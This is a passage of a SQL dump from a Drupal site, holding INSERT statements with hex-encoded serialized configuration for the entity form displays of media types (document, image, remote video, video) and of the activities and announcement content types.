6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a2270617468223b613a353a7b733a343a2274797065223b733a343a2270617468223b733a363a22776569676874223b693a33303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a363a22737461747573223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a333a22756964223b613a353a7b733a343a2274797065223b733a32393a22656e746974795f7265666572656e63655f6175746f636f6d706c657465223b733a363a22776569676874223b693a353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a313a7b733a343a226e616d65223b623a313b7d7d),
('', 'core.entity_form_display.media.document.media_library', 0x613a31313a7b733a343a2275756964223b733a33363a2231616537666437632d316434382d343436652d386531662d653364663034633761383732223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a333a7b693a303b733a34313a22636f72652e656e746974795f666f726d5f6d6f64652e6d656469612e6d656469615f6c696272617279223b693a313b733a34373a226669656c642e6669656c642e6d656469612e646f63756d656e742e6669656c645f6d656469615f646f63756d656e74223b693a323b733a31393a226d656469612e747970652e646f63756d656e74223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22646370667071794c584f534770756c61634d414a5733482d4733345f4c654e736a64667864315f6f436659223b7d733a323a226964223b733a32383a226d656469612e646f63756d656e742e6d656469615f6c696272617279223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a343a226d6f6465223b733a31333a226d656469615f6c696272617279223b733a373a22636f6e74656e74223b613a313a7b733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a363a7b733a373a2263726561746564223b623a313b733a32303a226669656c645f6d656469615f646f63756d656e74223b623a313b733a343a226e616d65223b623a313b733a343a2270617468223b623a313b733a363a22737461747573223b623a313b733a333a22756964223b623a313b7d7d),
('', 'core.entity_form_display.media.image.default', 0x613a31313a7b733a343a2275756964223b733a33363a2236623732353438352d636334312d343265372d383432622d653339356136666663303438223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a333a7b693a303b733a34313a226669656c642e6669656c642e6d656469612e696d6167652e6669656c645f6d656469615f696d616765223b693a313b733a32313a22696d6167652e7374796c652e7468756d626e61696c223b693a323b733a31363a226d656469612e747970652e696d616765223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a353a22696d616765223b693a313b733a343a2270617468223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224a5359342d4a50794e5a426959596f36696d64525946365f53647457516578506e64724c766e332d767734223b7d733a323a226964223b733a31393a226d656469612e696d6167652e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a363a7b733a373a2263726561746564223b613a353a7b733a343a2274797065223b733a31383a226461746574696d655f74696d657374616d70223b733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a31373a226669656c645f6d656469615f696d616765223b613a353a7b733a343a2274797065223b733a31313a22696d6167655f696d616765223b733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b733a31393a22707265766965775f696d6167655f7374796c65223b733a393a227468756d626e61696c223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a2270617468223b613a353a7b733a343a2274797065223b733a343a2270617468223b733a363a22776569676874223b693a33303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a363a22737461747573223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a333a22756964223b613a353a7b733a343a2274797065223b733a32393a22656e746974795f7265666572656e63655f6175746f636f6d706c657465223b733a363a22776569676874223b693a353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a313a7b733a343a226e616d65223b623a313b7d7d),
('', 'core.entity_form_display.media.image.media_library', 0x613a31313a7b733a343a2275756964223b733a33363a2265356238613066662d346563322d346638342d396339382d396635303534623830373835223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a343a7b693a303b733a34313a22636f72652e656e746974795f666f726d5f6d6f64652e6d656469612e6d656469615f6c696272617279223b693a313b733a34313a226669656c642e6669656c642e6d656469612e696d6167652e6669656c645f6d656469615f696d616765223b693a323b733a32313a22696d6167652e7374796c652e7468756d626e61696c223b693a333b733a31363a226d656469612e747970652e696d616765223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a353a22696d616765223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22424d4c724b347a4b70382d46466e4d73654264545f36683659697055734b52666244665f33575542354841223b7d733a323a226964223b733a32353a226d656469612e696d6167652e6d656469615f6c696272617279223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a343a226d6f6465223b733a31333a226d656469615f6c696272617279223b733a373a22636f6e74656e74223b613a323a7b733a31373a226669656c645f6d656469615f696d616765223b613a353a7b733a343a2274797065223b733a31313a22696d6167655f696d616765223b733a363a22776569676874223b693a313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b733a31393a22707265766965775f696d6167655f7374796c65223b733a393a227468756d626e61696c223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a353a7b733a373a2263726561746564223b623a313b733a343a226e616d65223b623a313b733a343a2270617468223b623a313b733a363a22737461747573223b623a313b733a333a22756964223b623a313b7d7d),
('', 'core.entity_form_display.media.remote_video.default', 0x613a31313a7b733a343a2275756964223b733a33363a2263616365373630662d323566632d343764612d623566382d343461323630616435393366223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a35353a226669656c642e6669656c642e6d656469612e72656d6f74655f766964656f2e6669656c645f6d656469615f6f656d6265645f766964656f223b693a313b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a353a226d65646961223b693a313b733a343a2270617468223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22704d386d476c7766707666475f7935745a6e306c474158464c587a325f794b6b4c374d76575a7352716441223b7d733a323a226964223b733a32363a226d656469612e72656d6f74655f766964656f2e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a363a7b733a373a2263726561746564223b613a353a7b733a343a2274797065223b733a31383a226461746574696d655f74696d657374616d70223b733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32343a226669656c645f6d656469615f6f656d6265645f766964656f223b613a353a7b733a343a2274797065223b733a31363a226f656d6265645f746578746669656c64223b733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a2270617468223b613a353a7b733a343a2274797065223b733a343a2270617468223b733a363a22776569676874223b693a33303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a363a22737461747573223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a333a22756964223b613a353a7b733a343a2274797065223b733a32393a22656e746974795f7265666572656e63655f6175746f636f6d706c657465223b733a363a22776569676874223b693a353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a313a7b733a343a226e616d65223b623a313b7d7d),
('', 'core.entity_form_display.media.remote_video.media_library', 0x613a31313a7b733a343a2275756964223b733a33363a2233316364316262612d326131362d343064322d616166372d663066333937326636633332223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a333a7b693a303b733a34313a22636f72652e656e746974795f666f726d5f6d6f64652e6d656469612e6d656469615f6c696272617279223b693a313b733a35353a226669656c642e6669656c642e6d656469612e72656d6f74655f766964656f2e6669656c645f6d656469615f6f656d6265645f766964656f223b693a323b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2254426750572d7561585261494342774c615663313672587052694c536b6e44496446397130584c3771736f223b7d733a323a226964223b733a33323a226d656469612e72656d6f74655f766964656f2e6d656469615f6c696272617279223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a343a226d6f6465223b733a31333a226d656469615f6c696272617279223b733a373a22636f6e74656e74223b613a313a7b733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a363a7b733a373a2263726561746564223b623a313b733a32343a226669656c645f6d656469615f6f656d6265645f766964656f223b623a313b733a343a226e616d65223b623a313b733a343a2270617468223b623a313b733a363a22737461747573223b623a313b733a333a22756964223b623a313b7d7d),
('', 'core.entity_form_display.media.video.default', 0x613a31313a7b733a343a2275756964223b733a33363a2265373133613833642d373538342d343738382d616134332d383033353164663866313132223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a323a7b693a303b733a34363a226669656c642e6669656c642e6d656469612e766964656f2e6669656c645f6d656469615f766964656f5f66696c65223b693a313b733a31363a226d656469612e747970652e766964656f223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a343a2270617468223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22306b49496144547436646978587938545a6b6174324d4e475a4a36766b524738546142575479334531624d223b7d733a323a226964223b733a31393a226d656469612e766964656f2e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a363a7b733a373a2263726561746564223b613a353a7b733a343a2274797065223b733a31383a226461746574696d655f74696d657374616d70223b733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32323a226669656c645f6d656469615f766964656f5f66696c65223b613a353a7b733a343a2274797065223b733a31323a2266696c655f67656e65726963223b733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a2270617468223b613a353a7b733a343a2274797065223b733a343a2270617468223b733a363a22776569676874223b693a33303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a363a22737461747573223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a3130303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a333a22756964223b613a353a7b733a343a2274797065223b733a32393a22656e746974795f7265666572656e63655f6175746f636f6d706c657465223b733a363a22776569676874223b693a353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a313a7b733a343a226e616d65223b623a313b7d7d),
('', 'core.entity_form_display.media.video.media_library', 0x613a31313a7b733a343a2275756964223b733a33363a2234633038646535652d353263632d343832322d616435642d343032653264356534646133223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a333a7b693a303b733a34313a22636f72652e656e746974795f666f726d5f6d6f64652e6d656469612e6d656469615f6c696272617279223b693a313b733a34363a226669656c642e6669656c642e6d656469612e766964656f2e6669656c645f6d656469615f766964656f5f66696c65223b693a323b733a31363a226d656469612e747970652e766964656f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226b47763859736f707148767a547a62375154494e57637630666e4e61355a4451795a78704f51523276726f223b7d733a323a226964223b733a32353a226d656469612e766964656f2e6d656469615f6c696272617279223b733a31363a22746172676574456e7469747954797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a343a226d6f6465223b733a31333a226d656469615f6c696272617279223b733a373a22636f6e74656e74223b613a313a7b733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a363a7b733a373a2263726561746564223b623a313b733a32323a226669656c645f6d656469615f766964656f5f66696c65223b623a313b733a343a226e616d65223b623a313b733a343a2270617468223b623a313b733a363a22737461747573223b623a313b733a333a22756964223b623a313b7d7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'core.entity_form_display.node.activities.default', 0x613a31303a7b733a343a2275756964223b733a33363a2263333938366464372d336431662d343939362d383630662d353139323839333632393733223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a373a7b693a303b733a33323a226669656c642e6669656c642e6e6f64652e616374697669746965732e626f6479223b693a313b733a35363a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f6465736372697074696f6e223b693a323b733a35383a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b693a333b733a34383a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f696d67223b693a343b733a35343a226669656c642e6669656c642e6e6f64652e616374697669746965732e6669656c645f616374697669746965735f706f73745f64617465223b693a353b733a32313a22696d6167652e7374796c652e7468756d626e61696c223b693a363b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a353a7b693a303b733a383a226461746574696d65223b693a313b733a343a2266696c65223b693a323b733a353a22696d616765223b693a333b733a343a2270617468223b693a343b733a343a2274657874223b7d7d733a323a226964223b733a32333a226e6f64652e616374697669746965732e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31303a2261637469766974696573223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a31333a7b733a343a22626f6479223b613a353a7b733a343a2274797065223b733a32363a22746578745f74657874617265615f776974685f73756d6d617279223b733a363a22776569676874223b693a333b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a343a22726f7773223b693a393b733a31323a2273756d6d6172795f726f7773223b693a333b733a31313a22706c616365686f6c646572223b733a303a22223b733a31323a2273686f775f73756d6d617279223b623a303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a373a2263726561746564223b613a353a7b733a343a2274797065223b733a31383a226461746574696d655f74696d657374616d70223b733a363a22776569676874223b693a373b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32383a226669656c645f616374697669746965735f6465736372697074696f6e223b613a353a7b733a343a2274797065223b733a32363a22746578745f74657874617265615f776974685f73756d6d617279223b733a363a22776569676874223b693a313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a343a22726f7773223b693a393b733a31323a2273756d6d6172795f726f7773223b693a333b733a31313a22706c616365686f6c646572223b733a303a22223b733a31323a2273686f775f73756d6d617279223b623a303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a33303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b613a353a7b733a343a2274797065223b733a31323a2266696c655f67656e65726963223b733a363a22776569676874223b693a353b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32303a226669656c645f616374697669746965735f696d67223b613a353a7b733a343a2274797065223b733a31313a22696d6167655f696d616765223b733a363a22776569676874223b693a343b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b733a31393a22707265766965775f696d6167655f7374796c65223b733a393a227468756d626e61696c223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32363a226669656c645f616374697669746965735f706f73745f64617465223b613a353a7b733a343a2274797065223b733a31363a226461746574696d655f64656661756c74223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a2270617468223b613a353a7b733a343a2274797065223b733a343a2270617468223b733a363a22776569676874223b693a31303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a373a2270726f6d6f7465223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a383b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a363a22737461747573223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a31313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a363a22737469636b79223b613a353a7b733a343a2274797065223b733a31363a22626f6f6c65616e5f636865636b626f78223b733a363a22776569676874223b693a393b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31333a22646973706c61795f6c6162656c223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a353a227469746c65223b613a353a7b733a343a2274797065223b733a31363a22737472696e675f746578746669656c64223b733a363a22776569676874223b693a303b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a333a22756964223b613a353a7b733a343a2274797065223b733a32393a22656e746974795f7265666572656e63655f6175746f636f6d706c657465223b733a363a22776569676874223b693a363b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b733a343a2273697a65223b693a36303b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d7d733a363a2268696464656e223b613a303a7b7d7d),
('', 'core.entity_form_display.node.announcement.default', 0x613a31303a7b733a343a2275756964223b733a33363a2263616134373930342d663966362d343163622d396538632d366539326233666531643539223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a353a7b693a303b733a33343a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e626f6479223b693a313b733a35343a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f616e6e6f756e63655f706f73745f64617465223b693a323b733a34373a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f6465736372697074696f6e223b693a333b733a34393a226669656c642e6669656c642e6e6f64652e616e6e6f756e63656d656e742e6669656c645f646f776e6c6f61645f66696c65223b693a343b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a343a7b693a303b733a383a226461746574696d65223b693a313b733a343a2266696c65223b693a323b733a343a2270617468223b693a333b733a343a2274657874223b7d7d733a323a226964223b733a32353a226e6f64652e616e6e6f756e63656d656e742e64656661756c74223b733a31363a22746172676574456e7469747954797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a343a226d6f6465223b733a373a2264656661756c74223b733a373a22636f6e74656e74223b613a31323a7b733a343a22626f6479223b613a353a7b733a343a2274797065223b733a32363a22746578745f74657874617265615f776974685f73756d6d617279223b733a363a22776569676874223b693a333b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a343a7b733a343a22726f7773223b693a393b733a31323a2273756d6d6172795f726f7773223b693a333b733a31313a22706c616365686f6c646572223b733a303a22223b733a31323a2273686f775f73756d6d617279223b623a303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a373a2263726561746564223b613a353a7b733a343a2274797065223b733a31383a226461746574696d655f74696d657374616d70223b733a363a22776569676874223b693a363b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a32343a226669656c645f616e6e6f756e63655f706f73745f64617465223b613a353a7b733a343a2274797065223b733a31363a226461746574696d655f64656661756c74223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a31373a226669656c645f6465736372697074696f6e223b613a353a7b733a343a2274797065223b733a31333a22746578745f7465787461726561223b733a363a22776569676874223b693a313b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a323a7b733a343a22726f7773223b693a353b733a31313a22706c616365686f6c646572223b733a303a22223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a31393a226669656c645f646f776e6c6f61645f66696c65223b613a353a7b733a343a2274797065223b733a31323a2266696c655f67656e65726963223b733a363a22776569676874223b693a343b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31383a2270726f67726573735f696e64696361746f72223b733a383a227468726f62626572223b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a313a7b733a31343a22696e636c7564655f6c6f636b6564223b623a313b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a343a2270617468223b613a353a7b733a343a2274797065223b733a343a2270617468223b733a363a22776569676874223b693a393b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a383a2273657474696e6773223b613a303a7b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a303a7b7d7d733a373a2270726f6d6f7465223b613a353a7b733a